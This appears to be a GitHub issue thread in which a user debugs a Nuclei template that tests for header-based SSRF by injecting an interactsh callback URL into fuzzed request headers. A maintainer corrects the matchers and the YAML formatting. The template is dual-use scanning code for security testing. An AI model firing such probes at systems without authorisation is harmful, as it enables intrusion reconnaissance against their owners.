error in coustom template

[r0x5r]

id: ssrf-head-poc

info:
  name: ssrf
  author: rohit
  severity: critical
  tags: ssrf

requests:
  - raw:
      - |
        GET /?cfbr=12.00 HTTP/1.1
        Host: {{Hostname}}
        {{header}}: {{interactsh-url}}

      

    payloads:
      header: /home/kali/tool/nu/header.txt




    attack: clusterbomb
    matchers-condition: and
    matchers:
     - type: word
        part: interactsh_protocol # Confirms http   Interaction
        words:
          - "http"

      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output

[r0x5r]

may be this tempalte not working well this template for header based ssrf

[ehsandeep]

@rohit0x5 matchers look wrong in the above template as in includes 3rd matcher looking for $hostname data which is specific to log4j template which it will be never true in this generic test, instead you can use below template.

    attack: clusterbomb
    matchers:
     - type: word
        part: interactsh_protocol # Confirms http   Interaction
        words:
          - "http"
          - "dns"
        condition: or

[r0x5r]

id: ssrf-head-poc

info:
name: ssrf
author: rohit
severity: critical
tags: ssrf

requests:

• raw:

  • |
    GET /?cfbr=12.00 HTTP/1.1
    Host: {{Hostname}}
    {{header}}: {{interactsh-url}}

  payloads:
  header: /home/kali/nuclei-templates/helpers/payloads/request-headers.txt

  attack: clusterbomb
  matchers:

  • type: word
    part: interactsh_protocol
    words:
    • "http"
    • "dns"
      condition: or

[WRN] Use with caution. You are responsible for your actions.
[WRN] Developers assume no liability and are not responsible for any misuse or damage.
[WRN] Could not load template /home/kali/tool/nu/ssrf_1.yaml: yaml: line 27: mapping values are not allowed in this context
[ERR] Error occurred loading template /home/kali/tool/nu/ssrf_1.yaml: yaml: line 27: mapping values are not allowed in this context
[FTL] Could not validate templates: errors occured during template validation

line no 27 give error
part: interactsh_protocol

[r0x5r]

any update

[ehsandeep]

there was typo the format in last comment, below example should work.

id: ssrf-head-poc

info:
  name: ssrf
  author: rohit
  severity: critical
  tags: ssrf

requests:
  - raw:
      - |
        GET /?cfbr=12.00 HTTP/1.1
        Host: {{Hostname}}
        {{header}}: {{interactsh-url}}

    payloads:
      header: /home/kali/nuclei-templates/helpers/payloads/request-headers.txt

    attack: clusterbomb
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"
        condition: or